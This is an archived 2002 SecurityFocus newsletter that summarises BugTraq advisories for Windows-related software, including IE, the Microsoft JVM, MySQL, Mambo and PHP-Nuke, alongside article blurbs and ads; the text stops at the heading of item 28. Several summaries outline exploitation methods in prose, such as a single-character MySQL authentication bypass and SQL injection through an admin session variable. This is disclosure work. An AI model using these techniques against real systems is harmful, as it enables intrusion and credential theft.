SecurityFocus Microsoft Newsletter #118
From: Marc Fossi (mfossi@securityfocus.com)
Date: 12/23/02
- Previous message: Hayes, Bill: "RE: Blank passwords, TsInternetUser added to Administrators"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Mon, 23 Dec 2002 12:27:16 -0700 (MST) From: Marc Fossi <mfossi@securityfocus.com> To: Focus-MS <focus-ms@securityfocus.com>
SecurityFocus Microsoft Newsletter #118
---------------------------------------
This issue is sponsored by: Qualys
Strengthening Network Security: FREE Guide Network security is a
constantly moving target - even proven solutions lose their punch over
time. Find out how to get COMPLETE PROTECTION against ever-growing
security threats with our FREE new Guide.
Get your copy today at: https://www.qualys.com/forms/nsguideh_376.php
-------------------------------------------------------------------------------
I. FRONT AND CENTER
1. Microsoft Baseline Security Analyzer V1.1
2. Evaluating Network Intrusion Detection Signatures, Part Three
3. OpenAV: Developing Open Source AntiVirus Engines
4. SecurityFocus DPP Program
5. InfoSec World Conference and Expo/2003 (March 10-12, 2003,Orlando,FL)
II. MICROSOFT VULNERABILITY SUMMARY
1. Microsoft Internet Explorer PNG Deflate Heap Corruption...
2. Microsoft Windows SMB Signing Vulnerability
3. Deerfield VisNetic WebSite Cross Site Scripting Vulnerability
4. Microsoft Java Virtual Machine COM Object Access Validation...
5. Microsoft Java Virtual Machine CODEBASE Parameter File...
6. MySQL COM_CHANGE_USER Password Length Account Compromise...
7. MySQL libmysqlclient Library Read_Rows Buffer Overflow...
8. MySQL libmysqlclient Library Read_One_Row Buffer Overflow...
9. Mambo Site Server PHPInfo.PHP Information Disclosure Vulnerability
10. Bea Systems WebLogic Xerces XML Parser Denial Of Service...
11. Microsoft Java Virtual Machine Standard Security Manager...
12. Microsoft Java Virtual Machine Java Object Instantiation...
13. Mambo Site Server Account Registration HTML Injection...
14. Mambo Site Server Path Disclosure Vulnerability
15. Captaris Infinite WebMail HTML Injection Vulnerability
16. EServ Buffer Overflow Vulnerability
17. PKZip Tar Hostile Destination Path Vulnerability
18. Microsoft Java Virtual Machine user.dir Access Information...
19. VIM ModeLines Arbitrary Command Execution Vulnerability
20. PHP-Nuke Web Mail Remote PHP Script Execution Vulnerability
21. Microsoft Java Virtual Machine Multiple Vulnerabilities
22. MySQL COM_CHANGE_USER Password Memory Corruption Vulnerability
23. Microsoft Java Virtual Machine URL Parsing Vulnerability
24. Microsoft Java Virtual Machine JDBC API Access Vulnerability
25. PHP-Nuke 6.0 Multiple Cross Site Scripting Vulnerabilities
26. Symantec Enterprise Firewall RealAudio Proxy Buffer Overflow...
27. MyPHPSoft MyPHPLinks SQL Injection Administration Bypassing...
28. Cypherix Cryptainer Information Disclosure Vulnerability
29. PHP-Nuke Web Mail Script Injection Vulnerability
30. PHP-Nuke Multiple Path Disclosure Vulnerabilities
31. ZipMagic Tar Hostile Destination Path Vulnerability
32. WinZip Tar Hostile Destination Path Vulnerability
III. MICROSOFT FOCUS LIST SUMMARY
1. Removing locking user from CTRL-ALT-DEL window - NT 4.0 (Thread)
2. Logging Terminal Services Access? (Thread)
3. ipsecpol on Windows 2000 (Thread)
4. SecurityFocus Microsoft Newsletter #117 (Thread)
5. Users Peeved at Microsoft Security Effort (Thread)
6. IIS 4 Security (Thread)
7. Exchange 5.5 delivery receipts (Thread)
8. Bulletin MS02-069 (Thread)
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
1. ipPulse
2. BVRP Mail Warden
3. Silent Watch
V. NEW TOOLS FOR MICROSOFT PLATFORMS
1. Lepton's Crack v1.0.1
2. perltrash v0.3
3. Opticon|Users 2002
VI. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Microsoft Baseline Security Analyzer V1.1
By Mike Fahland, Eric Schultze
Earlier this month, Microsoft released version 1.1 of the Microsoft
Baseline Security Analyzer (MBSA). This article will offer a brief
overview of MBSA.
http://online.securityfocus.com/infocus/1649
2. Evaluating Network Intrusion Detection Signatures, Part Three
by Karen Kent
In this three-part series of articles, we are presenting recommendations
that will help readers to evaluate the quality of network intrusion
detection (NID) signatures, either through hands-on testing or through
careful consideration of third-party product reviews and comparisons. The
first installment discussed some of the basics of evaluating NID signature
quality, as well as selecting attacks to be used in testing. The second
installment concluded the discussion of criteria for choosing attacks and
provided recommendations for generating attacks and creating a good
testing environment. This article will wrap up the series by examining
other ways of generating attacks with other security-related tools and by
manually creating your own attacks.
http://online.securityfocus.com/infocus/1651
3. OpenAV: Developing Open Source AntiVirus Engines
by Costin G. Raiu
This article will take a look at the OpenAntivirus AV engine, assess its
progress so far, and offer some suggestions of how the developers can
continue to develop it. While some of the commentary in the following
sections may be fairly critical, the purpose of this paper is not to flame
the OpenAV project or its developers but, on the contrary, to salute their
efforts. Hopefully, this article and the comments herein will make a
significant contribution to the development of a viable, working open
source antivirus product.
http://online.securityfocus.com/infocus/1650
4. SecurityFocus DPP Program
Attention Universities!! Sign-up now for preferred pricing on the only
global early-warning system for cyber attacks - SecurityFocus DeepSight
Threat Management System.
Click here for more information:
http://www.securityfocus.com/corporate/products/dpsection.shtml
5. InfoSec World Conference and Expo/2003 (March 10-12, 2003, Orlando, FL)
Optional Workshops March 8, 9, 12, 13, & 14 Vendor Expo March 10 & 11
Solutions to today’s security concerns; hands-on experts; blockbuster
vendor expo; the CISO Executive Summit; invaluable networking
opportunities. InfoSec World has it all!
Go to: http://www.misti.com/10/os03nl37inf.html
II. BUGTRAQ SUMMARY
-------------------
1. Microsoft Internet Explorer PNG Deflate Heap Corruption Vulnerability
BugTraq ID: 6366
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6366
Summary:
A heap corruption vulnerability has been reported for Microsoft Internet
Explorer 5.01 through 6.0.
The vulnerability is related to the way that Microsoft Internet Explorer
(MSIE) interprets PNG image data. Specifically, the 'inflate_fast()'
function within 'pngfilt.dll' does not properly handle invalid length
codes within PNG image files.
An attacker can exploit this vulnerability by tricking a user into viewing
a maliciously constructed PNG image file. When the image file is rendered
by the 'pngfilt.dll' library, it will trigger the heap corruption
condition and overwrite critical areas in memory. Any malicious
attacker-supplied code will be executed with elevated privileges.
It should be noted that applications which depend on MSIE to render PNG
files are also affected.
Internet Explorer 6.0 with Service Pack 1 is not affected by this issue.
2. Microsoft Windows SMB Signing Vulnerability
BugTraq ID: 6367
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6367
Summary:
Microsoft Windows 2000 and XP contain a new feature that can be set in
group policy allowing SMB packets to be digitally signed. There are four
settings that govern the signing of the SMB packets; two for acting as a
server and two for acting as a client. The system can be configured to
allow signing, disallow signing, or require signing. The default setting
is to allow signing, but not require it.
When two hosts establish an SMB session, negotiation of the digital
signing level occurs. The systems determine what level of signing each
requires and whether a connection can be established. If one system
cannot meet the other system's requirements, the communication channel is
not established.
Due to a flaw in the way the signing negotiation is implemented, an
attacker can malform a negotiation packet through a man-in-the-middle
attack to cause the target system to silently drop its signing requirement
for that particular session. This could allow the attacker to then modify
the SMB packets undetected by the receiving system since the digital
signature is not checked. The attacker would have to exploit this
vulnerability once for each SMB session to be modified.
It is important to note that when a client logs into a domain, the group
policy is transmitted from the server to the client using signed SMB
packets. This could allow a knowledgeable attacker to modify the group
policy settings that are applied to the client.
3. Deerfield VisNetic WebSite Cross Site Scripting Vulnerability
BugTraq ID: 6369
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6369
Summary:
VisNetic Website is web server that supports multiple domains, and allows
TLS/SSL secured domains. It is available for the Microsoft Windows
operating system.
When a requested page does not exist VisNetic Website will construct a
customized 404 page containing a link to the referring page. The referring
address is taken from the HTTP 'referer' header.
A vulnerability has been discovered in VisNetic Website when generating a
404 page for a non-existent resources. The issue is due to insufficient
sanitization of the HTTP 'referer' header. It is possible to cause
arbitrary code to be executed within the context of the visited 404 page
by embedding script code into the HTTP 'referer' header.
An attacker could exploit this issue to steal cookie-based authentication
credentials, which could be used to hijack a legitimate users session.
It should be noted that this vulnerability was discovered in VisNetic
Website 3.5.13.1. It is not yet known whether this issue also affects
earlier versions.
4. Microsoft Java Virtual Machine COM Object Access Validation Vulnerability
BugTraq ID: 6371
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6371
Summary:
The Microsoft Java Virtual Machine (JVM) implements the Java runtime
environment for Microsoft Internet Explorer. A vulnerability has been
discovered in the Microsoft JVM.
The vulnerability is due to insufficient checks in the JVM that allow
malicious, untrusted applets access to COM (Component Object Model)
objects. COM objects are used by the system to perform a variety of
functions, including the ability to modify data.
An attacker can exploit this vulnerability by creating a malicious applet
that invokes certain COM objects. Due to insufficient security checks
performed by the JVM, it is possible for the untrusted applet to access
the requested, sensitive COM object. Through the manipulation of the
object, the attacker can modify arbitrary files on the vulnerable system
and allow the attacker to obtain total control of the system.
This vulnerability was originally described in BID 6365. It is now being
assigned its own BugTraq ID.
5. Microsoft Java Virtual Machine CODEBASE Parameter File Disclosure Vulnerability
BugTraq ID: 6372
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6372
Summary:
The Microsoft JVM implements the Java runtime environment for Microsoft
Internet Explorer. A vulnerability has been discovered in the Microsoft
Java Virtual Machine.
The vulnerability results from a specially constructed 'CODEBASE'
parameter specified as part of an 'APPLET' HTML tag. The 'CODEBASE'
parameter tells the JVM where the applet is located. If an applet is
located on a local hard drive or resource, the applet has access to all
files and directories that lie directly under the path of its execution.
Due to insufficient parsing of HTML tags performed by the JVM, it may be
possible for a malicious applet to misrepresent the location of its
existence.
An attacker can exploit this vulnerability to load a malicious applet from
a remote site and trick the Virtual Machine into thinking that it was
executed from a trusted location, such as the vulnerable system's hard
drive. This will allow an attacker to obtain access to potentially
sensitive files on a vulnerable system or on network shares the user has
access to. The vendor has stated that the vulnerability will only allow an
attacker to obtain read access to files.
This vulnerability was originally described in BID 6365. It is now being
assigned its own BugTraq ID.
6. MySQL COM_CHANGE_USER Password Length Account Compromise Vulnerability
BugTraq ID: 6373
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6373
Summary:
MySQL is an open source relational database project, and is available for
a number of operating systems, including Microsoft Windows.
A flaw in the password authentication mechanism for MySQL may make it
possible for an authenticated database user to compromise the accounts of
other database users.
The flaw lies in the fact that the server uses a string returned by the
client when the COM_CHANGE_USER command is issued to iterate through a
comparison when attempting to authenticate the password. The server does
not verify that the password string is of sufficient length. As a result,
it is possible for a client to submit a single character as a response and
that single character will be compared to the expected password. If this
character matches the first character in the password, MySQL will
reportedly authenticate the user. The range of the valid character set
for passwords is 32 characters, which means that a malicious user can
authenticate after a maximum of 32 attempts if they cycle through all of
the valid characters.
Since this flaw exists in the COM_CHANGE_USER command, an attacker must
have access to a database user account to exploit the issue. They must
also know the username of the account they are attempting to compromise.
Depending on how the database has been deployed, this may allow for a
malicious user to compromise the MySQL root account.
This issue is related to the vulnerability described in Bugtraq ID 975.
The problem was not sufficiently addressed in the COM_CHANGE_USER command.
7. MySQL libmysqlclient Library Read_Rows Buffer Overflow Vulnerability
BugTraq ID: 6370
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6370
Summary:
MySQL is an open source relational database project, and is available for
a number of operating systems, including Microsoft Windows.
MySQL contains a library called libmysqlclient that allows queries to be
performed against the MySQL server database. A problem exists in the
read_rows function of the libmysqlclient library that could result in a
buffer overflow.
When the MySQL client performs a SELECT query on the database, the
read_rows function loops through the returned fields, copying them to a
local buffer. The problem occurs because the function does not verify
that the size of the returned fields are smaller than the buffer to which
they are being copied.
Additionally, each row is terminated with a '\0' without verifying that
there is sufficient space within the destination buffer.
This vulnerability may be exploited to cause a denial of service or to
execute arbitrary code in the security context of the MySQL client
application. Anything that is linked against libmysql may also be
affected by this issue.
8. MySQL libmysqlclient Library Read_One_Row Buffer Overflow Vulnerability
BugTraq ID: 6374
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6374
Summary:
MySQL is an open source relational database project, and is available for
a number of operating systems, including Microsoft Windows.
MySQL contains a library called libmysqlclient that allows queries to be
performed against the MySQL server database. A problem exists in the
read_one_row function of the libmysqlclient library that could result in a
buffer overflow.
When the MySQL client fetches a row from the database, read_one_row stores
the field and the field size without verifying that the data will not
overrun the buffer. After storing the pointer to a field, the function
terminates the previous field with a '\0' and moves on to the next field.
Since the data is not verified against the size of the buffer, a malformed
packet can supply an exceptionally long field size and have arbitrary
memory overwritten with a '\0', potentially causing the client to crash.
Successful exploitation will most likely result in a denial of service
against the MySQL client application. Though it hasn't been confirmed, it
may be possible with some client implementations to cause execution of
arbitrary code.
9. Mambo Site Server PHPInfo.PHP Information Disclosure Vulnerability
BugTraq ID: 6376
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6376
Summary:
Mambo Site Server is a freely available, open source web content
management tool. It is written in PHP, and available for Unix, Linux, and
Microsoft Windows operating systems.
A problem with Mambo may make it possible for a remote user to gain access
to sensitive information.
It has been reported that Mambo enables a script by default that may
reveal sensitive information. The phpinfo.php script is packaged with
Mambo, and installed by default in the administrator subdirectory. A
remote user may use this script to gain information about the server,
including path and environment information.
This vulnerability could lead to a more directed attack against hosts.
An attacker may access this script via
http://www.example.com/mambo/administrator/phpinfo.php.
10. Bea Systems WebLogic Xerces XML Parser Denial Of Service Vulnerability
BugTraq ID: 6378
Remote: No
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6378
Summary:
BEA Systems WebLogic Server is an enterprise level web and wireless
application server for Microsoft Windows and most Unix and Linux
distributions.
A problem with WebLogic could allow an attacker to deny service to
legitimate users.
A vulnerability in the handling of XML documents has been discovered.
XML documents are parsed by the Xerces component of the WebLogic
infrastructure. By parsing a malicious XML document locally, it is
possible to cause the WebLogic server process to hang.
This issue could allow an attacker with the ability to place files on the
vulnerable host to deny service to legitimate users. Normal service would
resume only when the process is killed, and manually restarted.
Additionally, this vulnerability could continue to be exploited until the
malicious XML file is removed.
11. Microsoft Java Virtual Machine Standard Security Manager Access Validation Vulnerability
BugTraq ID: 6381
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6381
Summary:
The Microsoft JVM implements the Java runtime environment for Microsoft
Internet Explorer. A vulnerability has been discovered in the Microsoft
Java Virtual Machine.
This vulnerability is due to a flaw in the access validation check
performed by the Virtual Machine's Standard Security Manager. This
vulnerability could allow an attacker to suppress the execution of Java
applets in the current Internet Explorer browser session.
The Standard Security Manager contains a list of Java applets and modules
that applets should not be allowed to invoke. Normally, only the Virtual
Machine itself should be allowed to write to the Standard Security
Manager. However, due to insufficient access validation controls, any
Java applet can write to the Standard Security Manager. This could allow
an attacker to add other applets to the banned list, preventing the
applets from executing or being executed by other applets.
Exploitation of this vulnerability would only affect the current Internet
Explorer browser session. Other sessions running in parallel to or after
the affected session would not be affected. Simply closing the affected
browser session would correct the results of exploitation.
12. Microsoft Java Virtual Machine Java Object Instantiation Denial Of Service Vulnerability
BugTraq ID: 6382
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6382
Summary:
The Microsoft JVM implements the Java runtime environment for Microsoft
Internet Explorer. A vulnerability has been discovered in the Microsoft
Java Virtual Machine.
The vulnerability may allow an attacker to cause the hosting application
to fail when a user executes a malicious applet. Restarting the hosting
application will restore normal functionality.
The vulnerability is due to the way the JVM initializes some Java objects.
An attacker can exploit this vulnerability by creating a Java applet that
will created an incorrectly initialized Java object. This will result in
the corruption of memory of the hosting application and its subsequent
failure.
This vulnerability was originally described in BID 6365. It is now being
assigned its own BugTraq ID.
13. Mambo Site Server Account Registration HTML Injection Vulnerability
BugTraq ID: 6386
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6386
Summary:
Mambo Site Server is a freely available, open source web content
management tool. It is written in PHP, and available for Unix, Linux, and
Microsoft Windows operating systems.
Mambo Site Server does not sufficiently sanitize HTML submitted through
the "Your Name" form field during account registration. Data in this
field may be output to other users, such as in articles. Though it has
been reported that an administrative user must approve articles before
they are displayed to other users, it is possible that malicious script
code may be displayed to the administrative user when an article is
reviewed for approval. This possibility has not been confirmed.
An attacker may include arbitrary HTML and script code in the "Your Name"
field and when this information is viewed by other users, the
attacker-supplied code will execute in their web client in the security
context of the site.
Exploitation may allow for theft of cookie-based authentication
credentials or other attacks.
It is possible that other account registration form fields also do not
sufficiently sanitize HTML.
14. Mambo Site Server Path Disclosure Vulnerability
BugTraq ID: 6387
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6387
Summary:
Mambo Site Server is a freely available, open source web content
management tool. It is written in PHP, and available for Unix, Linux, and
Microsoft Windows operating systems.
A vulnerability has been discovered in Mambo Site Server. Requesting the
'index.php' script with an invalid parameter will cause an error page to
be generated containing the path of the Mambo script.
This will disclose sensitive information about the layout of the
filesystem of the host running the vulnerable software. Information of
this nature may aid in mounting further attacks against the host.
It should be noted that this vulnerability was reported in Mambo Site
Server 4.0.11. It is not yet known whether other versions are affected.
15. Captaris Infinite WebMail HTML Injection Vulnerability
BugTraq ID: 6411
Remote: Yes
Date Published: Dec 16 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6411
Summary:
Captaris Infinite WebMail is a Web server application that provides HTML
access to email stored in SMTP, POP3, and IMAP mail systems. It is
available for the Microsoft Windows operating system.
A vulnerability has been discovered in Infinite WebMail. Due to
insufficient sanitization of HTML content it is possible to embed
arbitrary script code within an HTML email. The problem occurs in the <p>
and <b> HTML tags.
When an unsuspecting user of the vulnerable software views the malicious
message, the attacker-supplied code will executed in their web browser in
the security context of the webmail system.
This may allow an attacker to steal cookie-based authentication
credentials from users of the webmail system. Other attacks are also
possible.
16. EServ Buffer Overflow Vulnerability
BugTraq ID: 6391
Remote: Yes
Date Published: Dec 13 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6391
Summary:
EServ is a combination Mail, News, Web, FTP and Proxy Server for Microsoft
Windows 9x/NT/2000 systems.
A buffer overflow vulnerability has been reported for EServ. The
vulnerability occurs when EServ receives an overly long stream of data for
any of its listening services.
An attacker can exploit this vulnerability by sending an overly long
stream of data, consisting of at least 5080000 characters, to any of the
ports that EServ is listening on. This will trigger the buffer overflow
condition and will result in the EServ process crashing.
Although unconfirmed, it may be possible for an attacker to gain control
over the execution of the vulnerable process and execute malicious
attacker-supplied code.
This vulnerability was reported for EServ 2.97 and 2.99; it is likely that
previous versions are also affected.
17. PKZip Tar Hostile Destination Path Vulnerability
BugTraq ID: 6419
Remote: Yes
Date Published: Dec 17 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6419
Summary:
PKZip is prone to a security vulnerability when unpacking .tar archives.
The problem is in the handling of pathnames.
By specifying a path for an archived item which points outside the
expected directory scope, the creator of the archive can cause the file to
be extracted to arbitrary locations on the filesystem. An attacker may
take advantage of this vulnerability to cause malicious files to be placed
anywhere on a target filesystem.
An attacker may exploit this condition by specifying a relative extraction
path in a malicious .tar that points to sensitive or critical files, such
as system binaries.
This issue was reported in PKZip for Microsoft Windows platforms. It is
not known if other platforms are also affected.
This issue is similar to the issue described in Bugtraq ID 5933, but
affects how .tar archives are handled specifically.
This vulnerability was originally described in BID 6412 "Multiple Vendor
Archiving Software Tar Hostile Destination Path Vulnerability" and is now
being assigned an individual Bugtraq ID.
18. Microsoft Java Virtual Machine user.dir Access Information Disclosure Vulnerability
BugTraq ID: 6380
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6380
Summary:
The Microsoft JVM implements the Java runtime environment for Microsoft
Internet Explorer. A vulnerability has been discovered in the Microsoft
Java Virtual Machine.
The vulnerability may allow an attacker to obtain access to the user.dir
system property. The user.dir property contains information about the
current working directory of the hosting application.
An attacker can exploit this issue by enticing a user to execute a
malicious applet. The JVM does not restrict access to the user.dir system
property to untrusted Java applets and will result in the malicious applet
obtaining access to user.dir. This will allow an attacker to obtain
information that may be used to launch further attacks against a
vulnerable system.
This vulnerability was originally described in BID 6365. It is now being
assigned its own BugTraq ID.
19. VIM ModeLines Arbitrary Command Execution Vulnerability
BugTraq ID: 6384
Remote: No
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6384
Summary:
vim is a freely available, open source text editor. It is available for
Unix, Linux, and Microsoft Operating Systems.
A problem with vim may make it possible to execute arbitrary commands on a
vulnerable host.
It has been reported that a problem exists in vim with modelines.
Modelines are instructions placed at the beginning and end of text files
to instruct the editor on how to handle certain elements of the file.
Due to insufficent handling of input, it may be possible to execute
arbitrary commands through the modelines function.
This vulnerability could allow an attacker to execute arbitrary commands
with the privileges of the vim user. Through social engineering, this may
give an attacker the ability to gain remote access to the vulnerable host.
20. PHP-Nuke Web Mail Remote PHP Script Execution Vulnerability
BugTraq ID: 6399
Remote: Yes
Date Published: Dec 16 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6399
Summary:
PHP-Nuke is a web-based portal system. Implemented in PHP, it is available
for a range of systems, including Unix, Linux, and Microsoft Windows.
A vulnerability has been discovered in a web mail module available for
PHP-Nuke. When a user opens an email containing an attachment the file
will be stored in a remote accessible web directory. The module fails to
filter attachments containing active content, making it possible for an
attacker to access a PHP script located in the users web directory.
By sending a user a malicious attachment and then accessing the script a
remote attacker is able to cause arbitrary PHP code to be executed on the
target system. This may allow an attacker to access sensitive information
or compile malicious programs designed to open backdoors into the server.
21. Microsoft Java Virtual Machine Multiple Vulnerabilities
BugTraq ID: 6365
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6365
Summary:
Several vulnerabilities have been reported for Microsoft Java Virtual
Machine.
The first vulnerability may allow a malicious Java applet to access COM
(Component Object Model) objects. A malicious Java applet may be able to
access COM objects that allow control of the system. By exploiting this
vulnerability an attacker would be able to take complete control over a
compromised machine.
The second vulnerability may allow an attacker to misrepresent the
location of a malicious Java applet. Through the use of an APPLET HTML
tag, an attacker can specify a false value for the 'CODEBASE' parameter.
The 'CODEBASE' parameter is used to tell a browser where the Java applet
is located. An attacker can exploit this vulnerability to load a malicious
applet from a remote site and trick the Virtual Machine into thinking that
it was executed from a trusted location, such as the vulnerable system's
hard drive. This will allow an attacker to obtain access to potentially
sensitive files on a vulnerable system.
The third vulnerability may allow an attacker to construct a malicious URL
that would load a Java applet from an attacker's site but misrepresent it
as belonging to another, trusted, site. The vulnerability is due to a flaw
in the Virtual Machine's URL parser. An attacker can exploit this
vulnerability to intercept any traffic that the user would send to the
trusted site. This information may be used by an attacker to launch
further attacks against a vulnerable system.
The fourth vulnerability may allow an attacker to access databases used by
the system as another user. This will allow an attacker to obtain read and
write access to the database. This vulnerability is due to the bypassing
of existing security checks of the JDBC (Java Database Connectivity) APIs
by malicious applets.
The fifth vulnerability may allow an attacker to prevent Java applets on
other pages from running. This vulnerability exists due to insufficient
security checks in the Virtual Machine that allows Java applets to write
to the Standard Security Manager. An attacker can exploit this
vulnerability to write to the Standard Security Manager and prevent other
applets from being executed. This vulnerability will allow an attacker to
prevent Java applets from being run only in the current browser session;
any new browser sessions will be unaffected.
The sixth vulnerability may allow an attacker to obtain access to the
user.dir property. The user.dir property contains information about the
current working directory of the hosting application. Exploitation of this
issue may allow an attacker to obtain information that may be used to
launch further attacks against a vulnerable system.
The final vulnerability may allow an attacker to cause the hosting
application to fail when a user visits a malicious site. Restarting the
hosting application will restore normal functionality. The vulnerability
is due to the way the Virtual Machine initializes some Java objects. An
attacker can exploit this vulnerability by creating a Java applet that
will created an incorrectly initialized Java object. This will result in
the corruption of memory of the hosting application and its subsequent
failure.
** At the earliest possible convenience, this record will be divided up
into new vulnerability records where it is appropriate. Existing records
will also be updated to reflect the information contained in the Microsoft
Security Bulletin.
22. MySQL COM_CHANGE_USER Password Memory Corruption Vulnerability
BugTraq ID: 6375
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6375
Summary:
MySQL is an open source relational database project, and is available for
a number of operating systems, including Microsoft Windows.
MySQL is prone to a memory corruption vulnerability in the COM_CHANGE_USER
command.
Due to a lack of sufficient bounds checking for client responses to
password authentication challenges, it may be possible to corrupt
sensitive regions of memory.
It has been reported that it is possible to overwrite the saved
instruction pointer on the stack with bytes generated by the random number
generator of the password verification algorithm. Given enough attempts,
it may be possible for an attacker to change to flow of execution of the
program so that a significant region of memory is returned to, such as a
region containing attacker-supplied instructions. Failed exploitation
attempts will cause the MySQL server to crash, only to be restarted, so it
is possible for an attacker to make multiple exploitation attempts.
Theoretically, an attacker could leverage such a condition to cause
execution of arbitrary code in the security context of the MySQL server
process.
It is believed the attacker must be able to issue a COM_CHANGE_USER
command to exploit this issue, so having access to a valid database user
account may be a prerequisite for exploitation. It is not known if this
condition exists when an unauthenticated user attempts to authenticate
normally.
This condition may not be exploitable on Microsoft Windows platforms due
to the random number generator for the password verification algorithm
using a limited character set.
23. Microsoft Java Virtual Machine URL Parsing Vulnerability
BugTraq ID: 6377
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6377
Summary:
The Microsoft JVM implements the Java runtime environment for Microsoft
Internet Explorer. A vulnerability has been discovered in the Microsoft
Java Virtual Machine.
This vulnerability is due to a flaw in the way the JVM parses URLs. This
vulnerability may allow an attacker to construct a malicious URL that
would load a Java applet from an attacker's site but misrepresent it as
belonging to another, trusted, site.
An attacker can exploit this vulnerability to trick a user into executing
a malicious applet to intercept any traffic that the user would send to a
trusted site. Such information could include personal information or even
credit card details; an attacker could potentially obtain any information
the user is willing to divulge to the site from which the malicious applet
appears to originate. This vulnerability could also be used to steal
cookie based credentials.
This vulnerability was originally described in BID 6365. It is now being
assigned its own BugTraq ID.
24. Microsoft Java Virtual Machine JDBC API Access Vulnerability
BugTraq ID: 6379
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6379
Summary:
The Microsoft JVM implements the Java runtime environment for Microsoft
Internet Explorer. A vulnerability has been discovered in the Microsoft
Java Virtual Machine (JVM).
The vulnerability is due to insufficient security checks performed by the
JVM on JDBC (Java Database Connectivity) API access by remote applets. The
JDBC APIs are a set of functions that allow Java applets to access
databases on systems.
Only trusted Java applets should be able to access these APIs however, an
attacker may be able to create an applet that can bypass the existing
security checks performed by the JVM to access the APIs. This will allow
an attacker to access databases with the privileges of another user to
manipulate the contents of databases accessible by the user.
This vulnerability was originally described in BID 6365. It is now being
assigned its own BugTraq ID.
25. PHP-Nuke 6.0 Multiple Cross Site Scripting Vulnerabilities
BugTraq ID: 6409
Remote: Yes
Date Published: Dec 16 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6409
Summary:
PHP-Nuke is a web-based portal system. Implemented in PHP, it is available
for a range of systems, including Unix, Linux, and Microsoft Windows.
Cross-site scripting vulnerabilities have been discovered in multiple PHP
scripts used by PHP-Nuke 6. Due to insufficient sanitization of web
requests it is possible for script code to be embedded in PHP script
requests.
The scripts, which are vulnerable to these issues, include
'bb_smilies.php', 'bbcode_ref.php', 'editpost.php', 'newtopic.php',
'reply.php', 'topicadmin.php', 'viewforum.php', and 'searchbb.php'.
By constructing a malicious link which exploits one of these
vulnerabilities, it may be possible to execute arbitrary code within the
context of a website visited by an unsuspecting user. This may allow a
remote attacker to steal cookie-based authentication credentials, which
could be used at a later time to hijack a user's web session.
26. Symantec Enterprise Firewall RealAudio Proxy Buffer Overflow Vulnerability
BugTraq ID: 6389
Remote: Yes
Date Published: Dec 13 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6389
Summary:
Raptor Firewall is an enterprise level firewall originally developed by
Axent Technologies and is maintained and distributed by Symantec. Symantec
Enterprise Firewall is formerly known as Raptor firewall. It is available
for Microsoft Windows and Unix operating systems.
A vulnerability has been reported for Symantec Enterprise Firewall. A
buffer overflow vulnerability occurs in the RealAudio Proxy installed on
Symantec Enterprise Firewall. Reportedly when the Proxy process is sent a
specially formatted stream of data, it will trigger a buffer overflow
condition. This will result in the rad (ReadAudio) and statsd (statistics)
services to unexpectedly terminate and produce Dr. Watson logs.
The vulnerability occurs when the RealAudio Proxy receives packets that do
not follow the RealAudio Protocol. An attacker can exploit this
vulnerability and send a specially crafted stream of data to the Proxy
process. This will result in a local buffer to be overrun with attacker
supplied values and will trigger the buffer overflow condition. This will
cause the rad and statsd services to terminate resulting in a denial of
service condition.
Although unconfirmed, it may be possible for an attacker to gain control
over the execution of the vulnerable RealAudio Proxy process.
27. MyPHPSoft MyPHPLinks SQL Injection Administration Bypassing Vulnerability
BugTraq ID: 6395
Remote: Yes
Date Published: Dec 14 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6395
Summary:
MyPHPLinks is a freely available, open source PHP application distributed
by MyPHPSoft. It is available for Unix, Linux, and Microsoft Windows
operating systems.
A problem with MyPHPLinks could allow remote attackers unauthorized access
to system resources.
It has been reported that a problem with the checking of input by
MyPHPLinks exists. A problem in the checking of the idsession variable
used by MyPHPLinks to verify Administrator access may allow a remote user
to gain access to the host. This problem could allow an attacker to gain
administrator access to the MyPHPLinks section of a web site.
This vulnerability may be exploited by passing a SQL statement through the
idsession variable. This SQL statement must evaluate to true.
Exploitation of this vulnerability would allow an attacker to change the
links indexed in a MyPHPLink implementation.
28. Cypherix Cryptainer Information Disclosure Vulnerability
